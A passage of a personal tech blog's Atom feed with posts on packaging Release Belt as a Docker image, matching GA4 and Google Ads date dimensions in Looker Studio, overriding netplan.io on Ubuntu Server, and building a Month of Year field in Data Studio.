<p>Unfortunately, Release Belt was not available as a Docker image, and at <a href="https://www.tritonit.cz/">Triton IT</a> we run all of our key infrastructure in containers. With the assistance of my teammates I have <a href="https://github.com/marekrost/docker-release-belt">packaged Release Belt into a Docker image</a> and made it available directly from <a href="https://hub.docker.com/r/marekrost/release-belt">Docker Hub</a>.</p>]]></content><author><name>Marek Rost</name></author><summary type="html"><![CDATA[We have recently moved all Wordpress-based development in Triton IT to Bedrock by Roots.io. One of the perks of this system is the ability to manage all external code with PHP composer. What is the only caveat?]]></summary></entry><entry><title type="html">Google Looker Studio - Blending Google Analytics 4 and Google Ads the right way</title><link href="https://marekrost.cz/google-looker-studio-blending-ga4-and-google-ads-right-way/" rel="alternate" type="text/html" title="Google Looker Studio - Blending Google Analytics 4 and Google Ads the right way" /><published>2023-09-14T00:00:00+00:00</published><updated>2023-09-14T00:00:00+00:00</updated><id>https://marekrost.cz/google-looker-studio-blending-ga4-and-google-ads-right-way</id><content type="html" xml:base="https://marekrost.cz/google-looker-studio-blending-ga4-and-google-ads-right-way/"><![CDATA[<p><strong>Dimension</strong> names are deceptive. Just because they have the same name in both GA4 and Ads does not mean they follow the same data-formatting convention. To blend successfully, you have to make sure both <strong>Dimensions</strong> have the same data format. Watch out for source data granularity.</p>

<p>Quite some time has passed since my <a href="/google-data-studio-and-ga4-recreating-the-month-of-year-dimension-properly">last entry</a> on a similar topic. So much time, in fact, that Google Data Studio has been renamed in the meantime. This time I will be looking at blending Google Ads data with GA4 using time-based <strong>Dimensions</strong>.</p>

<p>In order to successfully blend data from GA4 and Ads while keeping a meaningful intersection (this means using a Left / Right outer join, or an Inner join), we naturally need a meaningful Join condition: a set of compatible fields shared between both source Tables.</p>

<p>At first glance this seems like a sensible assumption; however, I ran into surprising issues. Let’s have a look at a specific example: joining Tables using the <strong>Year</strong> dimension.</p>

<p><img src="looker-studio-inner-join-year.png" alt="Inner join setup in Looker Studio between GA4 and Google Ads using the Year dimension" /></p>

<p>The left table comes from Google Analytics 4 and the right table from Google Ads. A simple relationship between two same-named dimensions provided by two systems from the same company. What could go wrong?</p>

<p>I ended up with a <em>User Configuration Error</em> after finishing this Blended data setup. The error description was a single cryptic line: <em>This data source was improperly configured.</em></p>

<p>So what went wrong? While technically storing the same data, the two <strong>Year</strong> dimensions have different formatting. Let’s introduce a new term and call this the <strong>Native formatting</strong>. Unless two dimensions share the same Native formatting, they cannot be used to blend data successfully, even if they supposedly store the same type of information at the same granularity.</p>

<p>It is possible to reveal the Native formatting by using the <code class="language-plaintext highlighter-rouge">CAST(Dimension AS TEXT)</code> function and displaying the result in a Table chart. The following table lists key time-based Dimensions from Google Ads and Analytics 4 with value examples.</p>

<table>
  <thead>
    <tr>
      <th><strong>Data source</strong></th>
      <th><strong>Dimension</strong></th>
      <th><strong>Granularity</strong></th>
      <th><strong>CAST() example values</strong></th>
      <th><strong>Compatible dimensions</strong></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Google Analytics 4</td>
      <td><strong>Year</strong></td>
      <td>Year</td>
      <td>2023-01-01 / 2024-01-01 / 2025-01-01</td>
      <td>N/A</td>
    </tr>
    <tr>
      <td>Google Ads</td>
      <td><strong>Year</strong></td>
      <td>Year</td>
      <td>2023 / 2024 / 2025</td>
      <td>N/A</td>
    </tr>
    <tr>
      <td>Google Analytics 4</td>
      <td><strong>Month</strong></td>
      <td>Month</td>
      <td>1 / 2 / 3</td>
      <td>N/A</td>
    </tr>
    <tr>
      <td>Google Ads</td>
      <td><strong>Month</strong></td>
      <td>Month</td>
      <td>2023-01-01 / 2023-02-01 / 2023-03-01</td>
      <td><strong>GA4: Year month</strong></td>
    </tr>
    <tr>
      <td>Google Analytics 4</td>
      <td><strong>Year month</strong></td>
      <td>Month</td>
      <td>2023-01-01 / 2023-02-01 / 2023-03-01</td>
      <td><strong>Ads: Month</strong></td>
    </tr>
    <tr>
      <td>Google Analytics 4</td>
      <td><strong>Date</strong></td>
      <td>Day</td>
      <td>2023-01-01 / 2023-01-02 / 2023-01-03</td>
      <td><strong>Ads: Day</strong></td>
    </tr>
    <tr>
      <td>Google Ads</td>
      <td><strong>Day</strong></td>
      <td>Day</td>
      <td>2023-01-01 / 2023-01-02 / 2023-01-03</td>
      <td><strong>GA4: Date</strong></td>
    </tr>
  </tbody>
</table>

<p><strong>Table 1:</strong> Most common time-based dimensions and their Native formatting in Google Ads and Analytics 4, including which dimensions are compatible.</p>

<p>This reveals that the <strong>Year</strong> dimension from Google Ads is not compatible with the <strong>Year</strong> dimension from Google Analytics. At first glance it could be tempting to use <strong>GA4: Year</strong> with <strong>Ads: Month</strong> or <strong>Ads: Day</strong>, but that would be a bad idea: they do not preserve the same data granularity. Meaning: Metrics from one system would be aggregated into sets of a different size than those from the second system, which could lead to incorrect numbers in Looker Studio Charts. It is, in fact, exactly the same situation as described in my older <a href="/google-data-studio-and-ga4-recreating-the-month-of-year-dimension-properly">article on Google Data Studio</a>.</p>

<p>The takeaway: if we need year-level granularity, Google does not provide us with two compatible Dimensions. The solution: build a new field that converts both <strong>Year</strong> dimensions into a compatible format. The format has to match exactly: the same value representation and the same data type. This is best achieved by creating a new field in both source tables.</p>
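<p>The principle can be sketched outside Looker Studio. Python is used here purely as an illustration; the example values come from Table 1:</p>

```python
# Native formatting of the two Year dimensions, as revealed by CAST():
ga4_year = "2023-01-01"   # GA4: Year renders as the first day of the year
ads_year = "2023"         # Ads: Year renders as the bare year number

# A join on the raw values can never match:
assert ga4_year != ads_year

# Normalizing both sides to the same plain-text key makes them compatible.
just_year_ga4 = ga4_year[:4]   # mirrors SUBSTR(Year, 1, 4) on the GA4 side
just_year_ads = str(ads_year)  # mirrors CAST(Year AS TEXT) on the Ads side
assert just_year_ga4 == just_year_ads == "2023"
```

<p>Both normalized keys are plain text, which is exactly what the new field described below does inside Looker Studio.</p>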

<p>Let’s introduce a new dimension and call it <strong>Just year</strong>. The formula for Google Analytics 4 would be: <code class="language-plaintext highlighter-rouge">SUBSTR(Year, 1, 4)</code> and for Google Ads: <code class="language-plaintext highlighter-rouge">CAST(Year AS TEXT)</code>. This means neither field will even be treated as a time-based value, only as simple text. This isn’t a problem: they only provide the relationship between the two data sets. We can always use the real dimensions called <strong>Year</strong> to plot our Charts.</p>]]></content><author><name>Marek Rost</name></author><summary type="html"><![CDATA[Dimension names are deceptive. Just because they have the same name both in GA4 and Ads, it does not mean they follow the same convention of data formatting. To blend successfully, you have to make sure both Dimensions have the same data format. Watch out for source data granularity.]]></summary></entry><entry><title type="html">Why does Ubuntu server ignore systemd-networkd configuration</title><link href="https://marekrost.cz/why-does-ubuntu-server-ignore-systemd-networkd-configuration/" rel="alternate" type="text/html" title="Why does Ubuntu server ignore systemd-networkd configuration" /><published>2023-05-02T00:00:00+00:00</published><updated>2023-05-02T00:00:00+00:00</updated><id>https://marekrost.cz/why-does-ubuntu-server-ignore-systemd-networkd-configuration</id><content type="html" xml:base="https://marekrost.cz/why-does-ubuntu-server-ignore-systemd-networkd-configuration/"><![CDATA[<p>There is an additional service named <strong>netplan.io</strong> that overrides it. If you get rid of it, systemd-networkd will function correctly, just as described in the documentation.</p>

<p>I usually use Debian as the go-to OS for server machines; however, this time we were setting up several Dell servers that just wouldn’t boot the Debian ISO images. Time was of the essence, so we decided to grab the Ubuntu Server 22.04 LTS image instead.</p>

<p>We ran into trouble immediately when we tried to set up static networking. I checked whether systemd-networkd was present, and to my surprise, it was already running. I checked the NIC names and configured a static network in <code class="language-plaintext highlighter-rouge">/etc/systemd/network/</code> accordingly.</p>
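<p>For reference, the configuration looked roughly like this. This is a sketch; the file name, interface name, and addresses are illustrative, not the actual values from those servers:</p>

```ini
# /etc/systemd/network/10-static.network (illustrative example)
[Match]
Name=eno1

[Network]
Address=192.0.2.10/24
Gateway=192.0.2.1
DNS=192.0.2.53
```

<p>On a stock systemd-networkd setup, a file like this is all that static addressing requires.</p>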

<p>This did not work. Obviously, something was interfering with systemd-networkd. We reviewed running services with <code class="language-plaintext highlighter-rouge">systemctl status</code> and came up with nothing. The only remaining place that could reasonably be the source of such an override was D-Bus. A review of <code class="language-plaintext highlighter-rouge">/usr/share/dbus-1/system-services/</code> revealed a suspicious file named <code class="language-plaintext highlighter-rouge">io.netplan.Netplan.service</code>. By finding the source package of this file with <code class="language-plaintext highlighter-rouge">dpkg -S</code>, we finally had our culprit.</p>

<p>It turned out that the standard systemd-networkd function was overridden by another package named <strong>netplan.io</strong>, which has its own fancy <a href="https://netplan.io/">website</a>. Since we did not know the <strong>netplan.io</strong> syntax, it was easier to remove it completely (along with several Ubuntu meta-packages that depended on it). Removing netplan restored standard systemd-networkd function.</p>]]></content><author><name>Marek Rost</name></author><summary type="html"><![CDATA[There is an additional service named netplan.io that overrides it. If you get rid of it, systemd-networkd will function correctly, just as described in the documentation.]]></summary></entry><entry><title type="html">Google Data Studio and GA4 - Recreating the Month of Year dimension properly</title><link href="https://marekrost.cz/google-data-studio-and-ga4-recreating-the-month-of-year-dimension-properly/" rel="alternate" type="text/html" title="Google Data Studio and GA4 - Recreating the Month of Year dimension properly" /><published>2022-05-13T00:00:00+00:00</published><updated>2022-05-13T00:00:00+00:00</updated><id>https://marekrost.cz/google-data-studio-and-ga4-recreating-the-month-of-year-dimension-properly</id><content type="html" xml:base="https://marekrost.cz/google-data-studio-and-ga4-recreating-the-month-of-year-dimension-properly/"><![CDATA[<p><strong>2023-09-08 UPDATE</strong>: It is no longer necessary to create a custom <strong>Month of Year</strong> dimension. The new version of Google Data Studio (renamed to Looker Studio) now contains a dimension called <strong>Year month</strong>. Additionally, my function is broken due to internal changes to the <strong>Year</strong> dimension’s data formatting.</p>

<p><strong>Updated formula that works</strong> (credit to <strong><a href="http://facine.es/">Manuel Garcia</a></strong>):</p>

<p><code class="language-plaintext highlighter-rouge">PARSE_DATE('%Y-%m', CONCAT(SUBSTR(Year, 1, 4), '-', IF(Month &lt; 10, CONCAT('0', Month), CAST(Month AS TEXT ) ) ) )</code></p>

<h2 id="original-article-text">Original article text</h2>

<p>Getting the <strong>Month of Year</strong> dimension is not as simple as writing <code class="language-plaintext highlighter-rouge">TODATE(Date, '%Y-%m')</code>.</p>

<p>It is a bad idea to use the above formula. Why? Because there are cases where it will behave incorrectly, and you might snap your keyboard trying to figure out why your Google Data Studio dashboard doesn’t show the same data as your Google Analytics account.</p>

<p>The problem comes from the source dimension used to build your <strong>Month of Year</strong> field. Since the source dimension is not based on <strong>Month</strong> but on a single day (<strong>Date</strong>), the data pulled from your Google Analytics will have a different granularity.</p>

<p>This might not be a problem for metrics attached to a single event; however, metrics over larger scopes that are less dependent on a single point in time will produce distorted results.</p>

<p><img src="month-year-dim-ga4.png" alt="Comparison of Total users metric using correct vs incorrect Month of Year dimension in Google Data Studio" /></p>

<p>The above image demonstrates the difference on the <strong>Total users</strong> metric. The top chart uses a correctly prepared <strong>Month of Year</strong> dimension and shows visitor numbers corresponding to Google Analytics. The lower chart uses an incorrect <strong>Month of Year</strong> dimension built from <strong>Date</strong>, and the number of visitors appears higher.</p>

<p>So what is the reason for this difference? It is simple: the source dimensions you use to build custom fields in Data Studio dictate how the data gets collected from the Google Analytics database. When you use <strong>Date</strong> as the base for your <strong>Month of Year</strong> dimension, the <strong>Total users</strong> metric is exported for each day independently and only afterwards merged together into months. This is obviously a problem: some visitors might have visited your website on multiple days, yet their visits are now added up as if they came from different visitors.</p>
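<p>A toy example shows how per-day aggregation inflates the monthly number. Python is used purely as an illustration; the user IDs and dates are made up:</p>

```python
# Distinct users seen per day; user "a" visits on three different days.
visits = {
    "2022-05-01": {"a", "b"},
    "2022-05-02": {"a", "c"},
    "2022-05-03": {"a"},
}

# Correct: count each distinct user once over the whole month.
monthly_users = len(set().union(*visits.values()))

# Incorrect: export Total users per day, then sum the days up.
summed_daily_users = sum(len(users) for users in visits.values())

assert monthly_users == 3        # a, b, c
assert summed_daily_users == 5   # "a" counted three times
```

<p>The daily sum counts returning visitors once per day, which is exactly the inflation visible in the lower chart.</p>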

<p>So how do you build <strong>Month of Year</strong> correctly? Stick only to the <strong>Year</strong> and <strong>Month</strong> dimensions and merge them into a single field. The following formula is my crude implementation.</p>

<p><code class="language-plaintext highlighter-rouge">PARSE_DATE('%Y-%m', CONCAT(Year, '-', IF(Month &lt; 10, CONCAT('0', Month), CAST(Month AS TEXT ) ) ) )</code></p>

<p>The <strong>Year</strong> and <strong>Month</strong> dimensions are joined as text and <strong>Month</strong> is zero-padded when necessary (sadly, there is no LPAD function in Data Studio). Finally, the resulting text is converted back to a Date format so Data Studio recognizes this as a time-based field.</p>
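<p>The text-building part of the formula can be expressed in Python for clarity. This only mirrors the CONCAT / zero-padding logic; the Data Studio formula above (which also converts the text back to a Date) remains the authoritative version:</p>

```python
def month_of_year(year: int, month: int) -> str:
    """Mirror of the CONCAT step: join Year and a zero-padded Month,
    padding by hand since Data Studio has no LPAD function."""
    padded = "0" + str(month) if month < 10 else str(month)
    return str(year) + "-" + padded

assert month_of_year(2022, 5) == "2022-05"
assert month_of_year(2022, 11) == "2022-11"
```

<p>In the real formula, PARSE_DATE then turns this text back into a Date so charts can treat it as a time dimension.</p>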

<h2 id="article-changelog">Article changelog</h2>

<ul>
  <li>Updated bar chart image to corresponding time frames.</li>
  <li>Changed the correct dimension formula from compat. mode TODATE to PARSE_DATE.</li>
  <li>Update to Looker Studio renders this entire article obsolete.</li>
</ul>]]></content><author><name>Marek Rost</name></author><summary type="html"><![CDATA[2023-09-08 UPDATE: It is no longer necessary to create a custom Month of Year dimension. The new version of Google Data Studio (renamed to Looker Studio) now contains a dimension called Year month. Additionally, my function is broken due to internal changes to the Year dimension’s data formatting.]]></summary></entry></feed>